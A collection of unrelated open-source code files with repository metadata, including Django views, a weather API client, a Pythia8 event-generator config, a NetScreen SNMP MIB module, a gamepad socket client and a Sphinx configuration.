9278531e90e33fc43aaece367c9562b9b6808285 | a7288a7cc1e1a2c480347b7d7736e7264d49a7ce | /youtube_downloader_project/manage.py | 4ceec4879d34b51e0034ecffbb1d1d6bfdc6c532 | [] | no_license | JosephKhajoo/youtube_project | 2b259bf6c35db9a2940de51b52b91b69b5adf65d | 0be899be6a8f327e26171e04c4bd1fbccf81d6c6 | refs/heads/main | 2023-03-10T01:31:20.683766 | 2021-02-28T22:00:22 | 2021-02-28T22:00:22 | 343,223,685 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'youtube_downloader_project.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
36d9139dfd9873072c8719ca26c5ebc7c423058e | 595fc1fd741666554a6643d60b029855d8e4ea15 | /Messenger.py | 8b90d8cff35fa719027fa90c127da15e01d62a5e | [] | no_license | CLDXiang/weather_email_notification | 31e487d806ce863c231748d5ad64c64ccbe338b8 | 2d75654fbec777bbc84bf4aae17433e38c26d463 | refs/heads/master | 2020-12-03T03:55:03.414188 | 2017-08-18T16:25:48 | 2017-08-18T16:25:48 | 93,936,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,100 | py | # -*- coding:utf-8 -*-
# 得到天气信息
import datetime
import requests
import json
class Messenger:
def __init__(self):
with open('./config.json', 'r') as f:
self.KEY = json.load(f)['HEKey']
        self.num2day = {1: 'Mon', 2: 'Tue', 3: 'Wed', 4: 'Thu', 5: 'Fri', 6: 'Sat', 7: 'Sun'}
    def get_wea(self, record=False, city='上海'):  # city name in Chinese, as the HeWeather API expects
api_url = 'https://free-api.heweather.com/v5/forecast?city={city}&key={key}'.format(city=city, key=self.KEY)
wea_list = [] # weather
        print('Fetching weather info for ' + city + ' from free-api.heweather.com...')
# sleep(3)
page = requests.get(api_url)
page.encoding = 'utf-8'
wea_info = page.json()
for i, day_info in enumerate(wea_info['HeWeather5'][0]['daily_forecast']):
            date = day_info['date'][-2:]
            if i == 0:
                date += ' (today)'
            elif i == 1:
                date += ' (tomorrow)'
            elif i == 2:
                date += ' ({})'.format(self.num2day[(datetime.datetime.now() + datetime.timedelta(days=2)).isoweekday()])
            wea_list.append((date, day_info['cond']['txt_d'] + '-' + day_info['cond']['txt_n'],
                             day_info['tmp']['min'] + '/' + day_info['tmp']['max']))
        print('Finished fetching weather info for ' + city)
if record:
with open('./record.txt', 'w') as f:
for day in wea_list:
f.write(' '.join(day) + '\n')
            print('Record written to record.txt')
return wea_list
def whether_notice(self, wea_list, day=2):
'''
:param wea_list: [(day,weather,temperature),(day,weather,temperature),...]
:param day: how many days. default: today and tomorrow.
:return: True/False
'''
        for wea in wea_list[:day]:
            # HeWeather condition text is in Chinese; these characters mean
            # rain, snow, ice, haze and storm respectively
            if any([(i in wea[1]) for i in ['雨', '雪', '冰', '霾', '暴']]):
                return True
return False
messenger = Messenger()
if __name__ == '__main__':
messenger.get_wea(record=True)
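    # Hedged example of the notification check (assumes a valid HEKey in
    # config.json; get_wea defaults to Shanghai):
    if messenger.whether_notice(messenger.get_wea()):
        print('Bad weather expected in the next two days.')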
| [
"[email protected]"
] | |
5a7160d511dd2eb253990b60738b3b9a31a41143 | a07ed3f4984e8153219ef25927a5784c127f43a4 | /execute_command/venv/bin/easy_install-3.7 | f12394a8e18c462b84af11f281a787899d95dae8 | [] | no_license | golan1202/Hacking-with-Python | 939333b4e86669527f2ccf846caa49601fc05848 | 98e0b1fef562d64b3e6ec8eab90ed75fb8c3f221 | refs/heads/master | 2020-08-21T23:41:08.979455 | 2019-10-19T21:31:11 | 2019-10-19T21:31:11 | 216,272,690 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | 7 | #!/root/PycharmProjects/execute_command/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"[email protected]"
] | |
2f46a242dfd599c2ae9d4ba23d46aa9a5036cc3e | 4236ced786d9087925880a15e506f0965d7ebdc0 | /app/accounts/views.py | 5b46b89bcb5200f45e8bfb543b7b95ac8e7f569d | [] | no_license | ArturRejment/django-course | 94b3f4f06260dbb60e10fda9e58b84555dc37bc6 | 05254950160094b70b80837599bfa9407d9a2363 | refs/heads/main | 2023-05-31T10:07:13.500153 | 2021-06-18T19:34:01 | 2021-06-18T19:34:01 | 376,356,292 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,613 | py | from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.forms import inlineformset_factory
from django.contrib.auth.forms import UserCreationForm
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import Group
from .decorators import unauthenticated_user, allowed_users, admin_only
from .models import *
from .forms import *
from .filters import *
# Create your views here.
@login_required(login_url='login')
@admin_only
def dashboard(request):
orders = Order.objects.all()
customers = Customer.objects.all()
total_customers = customers.count()
total_orders = orders.count()
    delivered = orders.filter(status='Delivered').count()
    pending = orders.filter(status='Pending').count()
context = {
'orders': orders,
'customers': customers,
'total_customers': total_customers,
'total_orders': total_orders,
'delivered': delivered,
'pending': pending
}
return render(request, 'accounts/dashboard.html', context)
@login_required(login_url='login')
@allowed_users(allowed_roles=['admin'])
def customer(request, **kwargs):
    customer = Customer.objects.get(id=kwargs['id'])
    orders = customer.order_set.all()
    orders_num = orders.count()
    myFilter = OrderFilter(request.GET, queryset=orders)
orders = myFilter.qs
context = {
'customer': customer,
'orders': orders,
'orders_num': orders_num,
'order_filter': myFilter
}
return render(request, 'accounts/customer.html', context)
@login_required(login_url='login')
@allowed_users(allowed_roles=['admin'])
def products(request):
products = Product.objects.all()
context = {
'products': products
}
return render(request, 'accounts/products.html', context)
@login_required(login_url='login')
@allowed_users(allowed_roles=['admin'])
def createOrder(request, **kwargs):
    OrderFormSet = inlineformset_factory(Customer, Order, fields=('product', 'status'), extra=5)
    customer = Customer.objects.get(id=kwargs['id'])
    formSet = OrderFormSet(queryset=Order.objects.none(), instance=customer)
#form = OrderForm(initial = {'customer':customer})
if request.method == "POST":
formSet = OrderFormSet(request.POST, instance=customer)
#form = OrderForm(request.POST)
if formSet.is_valid():
formSet.save()
return redirect('/')
context = {'formset': formSet}
return render(request, 'accounts/order_form.html', context)
@login_required(login_url='login')
@allowed_users(allowed_roles=['admin'])
def updateOrder(request, **kwargs):
    order = Order.objects.get(id=kwargs['id'])
    form = OrderForm(instance=order)
if request.method == "POST":
form = OrderForm(request.POST, instance=order)
if form.is_valid():
form.save()
return redirect('/')
context = {'form': form}
return render(request, 'accounts/order_form.html', context)
@login_required(login_url='login')
@allowed_users(allowed_roles=['admin'])
def deleteOrder(request, **kwargs):
    order = Order.objects.get(id=kwargs['id'])
if request.method == "POST":
if request.POST.get('Yes'):
order.delete()
return redirect('/')
context = {'item': order}
return render(request, 'accounts/delete_order.html', context)
@login_required(login_url='login')
@allowed_users(allowed_roles=['customer'])
def userPage(request):
    orders = request.user.customer.order_set.all()
    # print('\nORDERS', orders)  # leftover debug output
    total_orders = orders.count()
    delivered = orders.filter(status='Delivered').count()
    pending = orders.filter(status='Pending').count()
context = {
'orders': orders,
'total_orders': total_orders,
'delivered': delivered,
'pending': pending}
return render(request, 'accounts/user.html', context)
@login_required(login_url='login')
@allowed_users(allowed_roles=['customer'])
def accountSettings(request):
customer = request.user.customer
    form = CustomerForm(instance=customer)
if request.method == 'POST':
form = CustomerForm(request.POST, request.FILES, instance=customer)
if form.is_valid():
form.save()
context = {'form':form}
return render(request, 'accounts/account_settings.html', context)
@unauthenticated_user
def registerPage(request):
form = CreateUserForm()
if request.method == "POST":
form = CreateUserForm(request.POST)
if form.is_valid():
user = form.save()
username = form.cleaned_data.get('username')
messages.success(request, 'User ' + username + ' created!')
return redirect('login')
context = {'form':form}
return render(request, 'accounts/register.html', context)
@unauthenticated_user
def loginPage(request):
if request.method == "POST":
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
return redirect('dashboard')
else:
messages.info(request, 'Username or password is incorrect')
context = {}
return render(request, 'accounts/login.html', context)
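# The decorators imported above live in .decorators (not shown). A minimal
# sketch of what they might look like, inferred only from how this module
# uses them (the redirect targets are assumptions):
#
#     def unauthenticated_user(view_func):
#         def wrapper(request, *args, **kwargs):
#             if request.user.is_authenticated:
#                 return redirect('dashboard')
#             return view_func(request, *args, **kwargs)
#         return wrapper
#
#     def allowed_users(allowed_roles=[]):
#         def decorator(view_func):
#             def wrapper(request, *args, **kwargs):
#                 group = request.user.groups.first()
#                 if group is not None and group.name in allowed_roles:
#                     return view_func(request, *args, **kwargs)
#                 return HttpResponse('You are not authorized to view this page')
#             return wrapper
#         return decorator
#
#     def admin_only(view_func):
#         def wrapper(request, *args, **kwargs):
#             group = request.user.groups.first()
#             if group is not None and group.name == 'customer':
#                 return redirect('user-page')
#             return view_func(request, *args, **kwargs)  # admins fall through
#         return wrapper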
def logoutPage(request):
logout(request)
return redirect('login') | [
"[email protected]"
] | |
e5d73ed435640a6033f68a23bf2813e2f9c10c29 | 0806383e9809acf99011cca90b1eed7b1a080165 | /2018/B2Phi_fragment_hardQCD.py | d81621ee6f6585a7ba6596a7a53eac86d65ac822 | [] | no_license | mmasciov/B2PhiSignalProduction | dbfeb436b3ec6efa969bc65b7c3401cfa781c710 | 4967569f0dd41878c76f0b54bf261f619823376b | refs/heads/master | 2022-11-13T05:24:38.492389 | 2020-07-07T16:07:25 | 2020-07-07T16:07:25 | 277,762,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,259 | py | import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.MCTunes2017.PythiaCP5Settings_cfi import *
# Production Info
configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$1.0$'),
name = cms.untracked.string('$Generic BBbar with a long-lived scalar resonance$'),
annotation = cms.untracked.string('Generic BBbar with a long-lived scalar resonance')
)
generator = cms.EDFilter("Pythia8GeneratorFilter",
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CP5SettingsBlock,
        processParameters = cms.vstring(
            'HardQCD:hardbbbar = on',
            'PhaseSpace:pTHatMin = 3',
            'ParticleDecays:limitTau0 = off',
            # 6000211 is the user-defined long-lived scalar:
            # mass 2.0 GeV, width 0.001 GeV, tau0 = 50 mm
            '6000211:all = GeneralResonance void 0 0 0 2.0 0.001 0.0 0.0 50',
            # scalar -> mu+ mu- (PDG ids 13 / -13)
            '6000211:oneChannel = 1 1.0 101 13 -13',
            # add scalar + hadron channels to B+ (521), B0 (511), Bs (531),
            # Bc (541) and Lambda_b (5122)
            '521:addChannel = 1 1 1 6000211 321',
            '511:addChannel = 1 1 1 6000211 311',
            '531:addChannel = 1 1 1 6000211 333',
            '541:addChannel = 1 1 1 6000211 431',
            '5122:addChannel = 1 1 1 6000211 3122',
        ),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CP5Settings',
'processParameters'),
),
comEnergy = cms.double(13000),
crossSection = cms.untracked.double(1),
filterEfficiency = cms.untracked.double(-1),
maxEventsToPrint = cms.untracked.int32(0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
pythiaPylistVerbosity = cms.untracked.int32(0)
)
### Filters
llphitomumukingenfilter = cms.EDFilter("PythiaDauVFilter",
verbose = cms.untracked.int32(1),
NumberDaughters = cms.untracked.int32(2),
ParticleID = cms.untracked.int32(6000211),
DaughterIDs = cms.untracked.vint32(13, -13),
MinPt = cms.untracked.vdouble( 3.0, 3.0),
MinEta = cms.untracked.vdouble(-2.4,-2.4),
MaxEta = cms.untracked.vdouble( 2.4, 2.4)
)
llphigenfilter = cms.EDFilter("PythiaDauFilter",
MinPt = cms.untracked.double(3.0),
MinEta = cms.untracked.double(-2.4),
MaxEta = cms.untracked.double( 2.4),
ParticleID = cms.untracked.int32(6000211),
DaughterIDs = cms.untracked.vint32(-13,13),
NumberDaughters = cms.untracked.int32(2)
)
### Production+filter sequence
ProductionFilterSequence = cms.Sequence(generator*llphitomumukingenfilter)
#ProductionFilterSequence = cms.Sequence(generator*llphigenfilter)
#ProductionFilterSequence = cms.Sequence(generator)
| [
"[email protected]"
] | |
3bd68691d412aeb06306ca53f88dfdcbe655bd24 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/NETSCREEN-SET-GEN-MIB.py | 33889b0e14736f295d3c28103487928e28685020 | [
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 5,948 | py | #
# PySNMP MIB module NETSCREEN-SET-GEN-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NETSCREEN-SET-GEN-MIB
# Produced by pysmi-0.3.4 at Wed May 1 14:20:23 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsIntersection, SingleValueConstraint, ConstraintsUnion, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ConstraintsUnion", "ValueRangeConstraint")
netscreenSetting, netscreenSettingMibModule = mibBuilder.importSymbols("NETSCREEN-SMI", "netscreenSetting", "netscreenSettingMibModule")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
MibIdentifier, Counter64, Counter32, Unsigned32, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, ObjectIdentity, ModuleIdentity, IpAddress, Bits, iso, Gauge32, NotificationType, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "Counter64", "Counter32", "Unsigned32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "ObjectIdentity", "ModuleIdentity", "IpAddress", "Bits", "iso", "Gauge32", "NotificationType", "Integer32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
netscreenSetGenMibModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 3224, 7, 0, 1))
netscreenSetGenMibModule.setRevisions(('2005-08-12 00:00', '2004-05-03 00:00', '2004-03-03 00:00', '2003-11-10 00:00', '2001-09-28 00:00', '2001-05-27 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: netscreenSetGenMibModule.setRevisionsDescriptions(('This module defines the object that are used to monitor all the configuration info', 'Modified copyright and contact information', 'Converted to SMIv2 by Longview Software', 'Correct spelling mistake', 'No Comment', 'Creation Date',))
if mibBuilder.loadTexts: netscreenSetGenMibModule.setLastUpdated('200405032022Z')
if mibBuilder.loadTexts: netscreenSetGenMibModule.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: netscreenSetGenMibModule.setContactInfo('Customer Support 1194 North Mathilda Avenue Sunnyvale, California 94089-1206 USA Tel: 1-800-638-8296 E-mail: [email protected] HTTP://www.juniper.net')
if mibBuilder.loadTexts: netscreenSetGenMibModule.setDescription('obsolete nsSetGenSysIp')
nsSetGeneral = MibIdentifier((1, 3, 6, 1, 4, 1, 3224, 7, 1))
nsSetGenSysIp = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 1), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenSysIp.setStatus('obsolete')
if mibBuilder.loadTexts: nsSetGenSysIp.setDescription('System Ip address')
nsSetGenHostName = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenHostName.setStatus('current')
if mibBuilder.loadTexts: nsSetGenHostName.setDescription('Host name of NetScreen device.')
nsSetGenDomain = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenDomain.setStatus('current')
if mibBuilder.loadTexts: nsSetGenDomain.setDescription('Domain name of NetScreen device.')
nsSetGenOpMode = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenOpMode.setStatus('current')
if mibBuilder.loadTexts: nsSetGenOpMode.setDescription('NetScreen device can work in one of the tree mode: transparent, NAT and route. This attribute indicates which operation mode it use.')
nsSetGenSwVer = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenSwVer.setStatus('current')
if mibBuilder.loadTexts: nsSetGenSwVer.setDescription('NetSceen OS version.')
nsSetGenLicInfo = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenLicInfo.setStatus('current')
if mibBuilder.loadTexts: nsSetGenLicInfo.setDescription('NetScreen OS license information.')
nsSetGenSCSAdminEnable = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("disable", 0), ("enabled", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenSCSAdminEnable.setStatus('current')
if mibBuilder.loadTexts: nsSetGenSCSAdminEnable.setDescription('enable Command Security Shell')
nsSetGenDropSelfLogPac = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("disable", 0), ("enabled", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenDropSelfLogPac.setStatus('current')
if mibBuilder.loadTexts: nsSetGenDropSelfLogPac.setDescription('Log Packets to Self that are dropped')
mibBuilder.exportSymbols("NETSCREEN-SET-GEN-MIB", nsSetGenDomain=nsSetGenDomain, nsSetGenOpMode=nsSetGenOpMode, nsSetGenLicInfo=nsSetGenLicInfo, nsSetGenSwVer=nsSetGenSwVer, nsSetGenHostName=nsSetGenHostName, nsSetGenDropSelfLogPac=nsSetGenDropSelfLogPac, netscreenSetGenMibModule=netscreenSetGenMibModule, nsSetGenSysIp=nsSetGenSysIp, nsSetGeneral=nsSetGeneral, nsSetGenSCSAdminEnable=nsSetGenSCSAdminEnable, PYSNMP_MODULE_ID=netscreenSetGenMibModule)
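# Hedged usage sketch (pysnmp 4.x high-level API; host and community string
# are placeholders). nsSetGenHostName is the scalar registered above at
# 1.3.6.1.4.1.3224.7.1.2, queried as instance .0:
#
#     from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
#                               ContextData, ObjectType, ObjectIdentity, getCmd)
#     errInd, errStat, errIdx, varBinds = next(getCmd(
#         SnmpEngine(), CommunityData('public'),
#         UdpTransportTarget(('192.0.2.1', 161)), ContextData(),
#         ObjectType(ObjectIdentity('1.3.6.1.4.1.3224.7.1.2.0'))))
#     if not errInd and not errStat:
#         print(varBinds[0])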
| [
"[email protected]"
] | |
ae92bab68137c027aa8f8979fd89aa003e2c5df6 | 2c81510e6d3a179ef65888791ba164a840614299 | /Network/gamepad/gamepad_client.py | 62f1fd836bcc1e3151ddc66d0b0baa9b5587e040 | [] | no_license | Alisa712/CYTON-VETA-7-DOF-Robot-Sensing-Touch | fe3e08425126a7fb2d88eafd37cad03d48614342 | 5a8e586d253465a235da3af4144ac5c0a4b81a71 | refs/heads/master | 2021-08-30T09:13:20.411681 | 2017-12-17T06:14:25 | 2017-12-17T06:14:25 | 114,512,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | import socket
import time
import pygame
pygame.init()
joy = pygame.joystick.Joystick(0)
joy.init()
host = 'localhost'
port = 5000
mySocket = socket.socket()
mySocket.connect((host,port))
def joystick():
    out = [0] * 16  # room for the axes and buttons of a typical pad; unused slots stay 0
    it = 0  # write index into out
    pygame.event.pump()
    # Read input from the joystick axes
    for i in range(0, joy.get_numaxes()):
        out[it] = joy.get_axis(i)
        it += 1
    # Read input from buttons
    for i in range(0, joy.get_numbuttons()):
        out[it] = joy.get_button(i)
        it += 1
    return out
try:
    while True:
        message = joystick()
        mySocket.send(str(message))
        print message
        time.sleep(0.5)
except KeyboardInterrupt:
    # without this, the close() below was unreachable behind the infinite loop
    pass
mySocket.close()
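# A minimal sketch of the server side this client expects (not part of this
# file; host and port mirror the values above):
#
#     import socket
#     server = socket.socket()
#     server.bind(('localhost', 5000))
#     server.listen(1)
#     conn, addr = server.accept()
#     while True:
#         data = conn.recv(1024)
#         if not data:
#             break
#         print(data)  # the stringified axis/button list sent by the client
#     conn.close()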
| [
"[email protected]"
] | |
6692fcd716647755e1aea133c8bd8b46dc51ecc7 | b8c2885a4d8daf34c2049ee727655d6de07857fe | /app/api/response/users.py | aefebe7b93d374cb709c22937cfe6c69ff0454e0 | [] | no_license | Ravillatypov/asterisk-integration-api | 870b9804b51dcc640b9b9a571d406f26804a6d30 | d4abeb5b87ab00c4b371d501f3d117feb5e4d72c | refs/heads/master | 2023-06-23T10:55:22.851334 | 2021-07-22T07:55:52 | 2021-07-22T08:24:31 | 264,633,533 | 2 | 1 | null | 2021-01-16T07:54:57 | 2020-05-17T10:04:40 | Python | UTF-8 | Python | false | false | 720 | py | from typing import List
from pydantic import BaseModel
class ResponseUser(BaseModel):
id: int
first_name: str
last_name: str
permissions: List[int]
username: str
is_active: bool
    company_id: Optional[int] = None
class Config:
orm_mode = True
class ResponseUsers(BaseModel):
result: List[ResponseUser]
def __init__(self, result, *args, **kwargs):
super(ResponseUsers, self).__init__(*args, result=[ResponseUser.from_orm(i) for i in result], **kwargs)
class ResponseRefreshAccessToken(BaseModel):
refresh_token: str
access_token: str
class Config:
orm_mode = True
class ResponseUserWithTokens(ResponseUser, ResponseRefreshAccessToken):
pass
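if __name__ == '__main__':
    # Minimal self-check with hypothetical data; pydantic's from_orm reads
    # plain attributes, so a SimpleNamespace stands in for an ORM object.
    from types import SimpleNamespace
    fake = SimpleNamespace(id=1, first_name='Ada', last_name='Lovelace',
                           permissions=[1], username='ada', is_active=True,
                           company_id=None)
    print(ResponseUsers([fake]).dict()['result'][0]['username'])  # -> ada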
| [
"[email protected]"
] | |
2e1b48cbfff274207746ac41229144bc61864cf9 | 0d87d81067a2d028b4d2c1a105df0518ac156b87 | /lab7/task7.py | 798a38e1537d8a63d25ff0dc28fbffb7e341806a | [] | no_license | sterliakov/IT-2022-labs-1-sem | 3c1c9c6250caef2258f443700a361c19cc3a082c | ee256f03198e39b22e385d8d5377bc3de772cdc9 | refs/heads/main | 2023-08-20T09:31:18.190399 | 2021-09-16T08:21:56 | 2021-09-16T08:21:56 | 405,976,481 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | STEPS = 2
def walk(x, y, x0, y0, remaining=STEPS):
if x == x0 and y == y0:
return remaining
remaining -= 1
if remaining == -1 or x <= 0 or y <= 0 or x > 8 or y > 8:
return -1
return max(
walk(x-2, y-1, x0, y0, remaining),
walk(x-2, y+1, x0, y0, remaining),
walk(x+2, y-1, x0, y0, remaining),
walk(x+2, y+1, x0, y0, remaining),
walk(x-1, y+2, x0, y0, remaining),
walk(x-1, y-2, x0, y0, remaining),
walk(x+1, y+2, x0, y0, remaining),
walk(x+1, y-2, x0, y0, remaining),
)
ret = walk(int(input()), int(input()), int(input()), int(input()), STEPS)
print(-1 if ret == -1 else STEPS - ret)  # number of moves actually used
| [
"[email protected]"
] | |
640e4256d48a98d957149e6ac184e44bf66b3a1c | 31e8765993b0df9988fab3615b346065c43d77db | /MyMainPackage/SubPackage/mysubscript.py | 11a90d17e55bf92b412da5b98055f2a42e305239 | [] | no_license | bopopescu/courses-projects-exercises | a4f37f9b96cb3e564c59fce957fa972db1013415 | d06e9684a79bd97e43c0f007968e55e4fcf11ce8 | refs/heads/master | 2022-11-23T14:26:50.059341 | 2020-04-15T09:56:29 | 2020-04-15T09:56:29 | 281,485,877 | 0 | 0 | null | 2020-07-21T19:27:34 | 2020-07-21T19:27:33 | null | UTF-8 | Python | false | false | 64 | py | def sub_report():
print("Hey I am function inside mysubscript") | [
"[email protected]"
] | |
430e4c22ffcc6af466cbe65051d710988206a800 | 0a7730b3595d16725366d1492e7526e58f65d859 | /docs/conf.py | a492105cb126c004f0e80c07a4c38fb16d531f53 | [] | permissive | telebotter/django-telegrambot | f22127e251cac4700eb79e934f0886bf7beb69bd | 70e6016b09d1fb91dd45e3cf2dc8fd8e82dbc824 | refs/heads/master | 2021-12-25T16:39:09.832480 | 2021-08-02T09:54:16 | 2021-08-02T09:54:16 | 212,980,072 | 15 | 11 | BSD-3-Clause | 2021-08-02T09:54:16 | 2019-10-05T10:17:32 | Python | UTF-8 | Python | false | false | 8,244 | py | # -*- coding: utf-8 -*-
#
# complexity documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
cwd = os.getcwd()
parent = os.path.dirname(cwd)
sys.path.append(parent)
import django_telegrambot
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-telegrambot'
copyright = u'2016, django-telegrambot'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = django_telegrambot.__version__
# The full version, including alpha/beta/rc tags.
release = django_telegrambot.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
